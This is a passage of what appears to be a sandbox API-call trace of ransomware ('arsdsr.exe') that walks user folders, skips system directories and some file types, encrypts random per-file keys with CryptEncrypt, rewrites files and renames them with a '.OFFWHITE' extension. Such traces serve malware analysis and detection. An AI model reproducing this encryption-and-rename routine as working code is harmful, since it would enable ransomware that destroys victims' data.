returned 0x500000 [0132.951] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.951] GetProcessHeap () returned 0x500000 [0132.951] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.951] GetProcessHeap () returned 0x500000 [0132.951] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.951] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt" [0132.951] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt.OFFWHITE" [0132.951] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\jbrqehqw843y2lip.ppt"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\JbRQehqW843y2LIP.ppt.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\jbrqehqw843y2lip.ppt.offwhite")) returned 1 [0132.952] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24a46420, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x40d04730, ftLastAccessTime.dwHighDateTime=0x1d5dd63, ftLastWriteTime.dwLowDateTime=0x40d04730, ftLastWriteTime.dwHighDateTime=0x1d5dd63, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x834c6249, cFileName="YQOkdNBO_856WnMN", cAlternateFileName="YQOKDN~1")) returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2=".") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="..") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="...") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="windows") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="$recycle.bin") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="rsa") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="ntuser.dat") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="programdata") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="appdata") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="program files") returned 1 [0132.952] lstrcmpiW (lpString1="YQOkdNBO_856WnMN", lpString2="program files (x86)") returned 1 [0132.952] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\" [0132.952] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\", lpString2="YQOkdNBO_856WnMN" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN" [0132.952] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" [0132.952] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" [0132.953] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\*.*" [0132.953] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24a46420, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x40d04730, ftLastAccessTime.dwHighDateTime=0x1d5dd63, ftLastWriteTime.dwLowDateTime=0x40d04730, ftLastWriteTime.dwHighDateTime=0x1d5dd63, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0x1ccacc96, cFileName=".", cAlternateFileName="")) returned 0x544590 [0132.954] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.955] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24a46420, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x40d04730, ftLastAccessTime.dwHighDateTime=0x1d5dd63, ftLastWriteTime.dwLowDateTime=0x40d04730, ftLastWriteTime.dwHighDateTime=0x1d5dd63, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0x1ccacc96, cFileName="..", cAlternateFileName="")) returned 1 [0132.955] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.955] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.955] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc853b390, ftCreationTime.dwHighDateTime=0x1d5d999, ftLastAccessTime.dwLowDateTime=0x1cda5400, ftLastAccessTime.dwHighDateTime=0x1d5e7cd, ftLastWriteTime.dwLowDateTime=0x1cda5400, ftLastWriteTime.dwHighDateTime=0x1d5e7cd, nFileSizeHigh=0x0, nFileSizeLow=0x744d, dwReserved0=0x295d83c, dwReserved1=0x1ccacc96, cFileName="6_7iD8vaRX7uGf.csv", cAlternateFileName="6_7ID8~1.CSV")) returned 1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2=".") returned 1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="..") returned 1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="...") returned 1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="windows") returned -1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="$recycle.bin") returned 1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="rsa") returned -1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="ntuser.dat") returned -1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="programdata") returned -1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="appdata") returned -1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="program files") returned -1 [0132.955] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="program files (x86)") returned -1 [0132.955] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" [0132.955] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\", lpString2="6_7iD8vaRX7uGf.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv" [0132.955] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.955] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.955] PathFindExtensionW (pszPath="6_7iD8vaRX7uGf.csv") returned=".csv" [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".cab") returned 1 [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".cmd") returned 1 [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".com") returned 1 [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".cpl") returned 1 [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0132.955] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0132.956] lstrcmpiW (lpString1=".csv", lpString2=".url") returned -1 [0132.956] lstrcmpiW (lpString1=".csv", lpString2=".ttf") returned -1 [0132.956] lstrcmpiW (lpString1=".csv", lpString2=".mp3") returned -1 [0132.956] lstrcmpiW (lpString1=".csv", lpString2=".pif") returned -1 [0132.956] lstrcmpiW (lpString1=".csv", lpString2=".mp4") returned -1 [0132.956] lstrcmpiW (lpString1=".csv", lpString2=".OFFWHITE") returned -1 [0132.956] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0132.956] lstrcmpiW (lpString1="6_7iD8vaRX7uGf.csv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.956] GetProcessHeap () returned 0x500000 [0132.956] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f648 [0132.956] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\6_7id8varx7ugf.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0132.957] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=29773) returned 1 [0132.957] GetProcessHeap () returned 0x500000 [0132.957] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.957] GetProcessHeap () returned 0x500000 [0132.957] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.957] GetProcessHeap () returned 0x500000 [0132.957] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.957] GetProcessHeap () returned 0x500000 [0132.957] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.957] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.957] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.957] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.957] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.957] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.957] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.957] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.957] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.958] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295d610*=0x100) returned 1 [0132.958] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.958] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.958] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295d60c*=0x100) returned 1 [0132.958] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x744d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.958] SetLastError (dwErrCode=0x0) [0132.958] WriteFile (in: hFile=0x214, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0132.960] GetLastError () returned 0x0 [0132.960] GetLastError () returned 0x0 [0132.960] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x754d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.960] WriteFile (in: hFile=0x214, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0132.960] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x764d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.960] WriteFile (in: hFile=0x214, lpBuffer=0x53f648*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x53f648*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0132.960] GetProcessHeap () returned 0x500000 [0132.960] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x744d) returned 0x55b7c0 [0132.960] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.961] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0x744d, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0x744d, lpOverlapped=0x0) returned 1 [0132.963] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.963] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0x744d, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0x744d, lpOverlapped=0x0) returned 1 [0132.963] GetProcessHeap () returned 0x500000 [0132.963] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0132.963] CloseHandle (hObject=0x214) returned 1 [0132.965] GetProcessHeap () returned 0x500000 [0132.965] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.965] GetProcessHeap () returned 0x500000 [0132.965] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.965] GetProcessHeap () returned 0x500000 [0132.965] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.965] GetProcessHeap () returned 0x500000 [0132.965] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.965] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv" [0132.965] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv.OFFWHITE" [0132.965] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\6_7id8varx7ugf.csv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\6_7iD8vaRX7uGf.csv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bk4kizkgwa\\yqokdnbo_856wnmn\\6_7id8varx7ugf.csv.offwhite")) returned 1 [0132.966] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x599d2250, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x66348310, ftLastAccessTime.dwHighDateTime=0x1d5dd4f, ftLastWriteTime.dwLowDateTime=0x66348310, ftLastWriteTime.dwHighDateTime=0x1d5dd4f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d83c, dwReserved1=0x1ccacc96, cFileName="Kb-m", cAlternateFileName="")) returned 1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2=".") returned 1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="..") returned 1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="...") returned 1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="windows") returned -1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="$recycle.bin") returned 1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="rsa") returned -1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="ntuser.dat") returned -1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="programdata") returned -1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="appdata") returned 1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="program files") returned -1 [0132.966] lstrcmpiW (lpString1="Kb-m", lpString2="program files (x86)") returned -1 [0132.966] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\" [0132.966] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\", lpString2="Kb-m" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m" [0132.966] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" [0132.966] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" [0132.967] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\*.*" [0132.967] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x599d2250, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x66348310, ftLastAccessTime.dwHighDateTime=0x1d5dd4f, ftLastWriteTime.dwLowDateTime=0x66348310, ftLastWriteTime.dwHighDateTime=0x1d5dd4f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName=".", cAlternateFileName="")) returned 0x544750 [0132.970] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.970] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x599d2250, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x66348310, ftLastAccessTime.dwHighDateTime=0x1d5dd4f, ftLastWriteTime.dwLowDateTime=0x66348310, ftLastWriteTime.dwHighDateTime=0x1d5dd4f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName="..", cAlternateFileName="")) returned 1 [0132.971] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.971] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.971] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef1c14c0, ftCreationTime.dwHighDateTime=0x1d5db71, ftLastAccessTime.dwLowDateTime=0xeff49120, ftLastAccessTime.dwHighDateTime=0x1d5e6fb, ftLastWriteTime.dwLowDateTime=0xeff49120, ftLastWriteTime.dwHighDateTime=0x1d5e6fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x4a1c9356, cFileName="1gOoMn6OavxQS DKMbMx", cAlternateFileName="1GOOMN~1")) returned 1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2=".") returned 1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="..") returned 1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="...") returned 1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="windows") returned -1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="$recycle.bin") returned 1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="rsa") returned -1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="ntuser.dat") returned -1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="programdata") returned -1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="appdata") returned -1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="program files") returned -1 [0132.971] lstrcmpiW (lpString1="1gOoMn6OavxQS DKMbMx", lpString2="program files (x86)") returned -1 [0132.971] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\" [0132.971] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\", lpString2="1gOoMn6OavxQS DKMbMx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx" [0132.971] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" [0132.971] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS DKMbMx\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bk4kizkgWa\\YQOkdNBO_856WnMN\\Kb-m\\1gOoMn6OavxQS 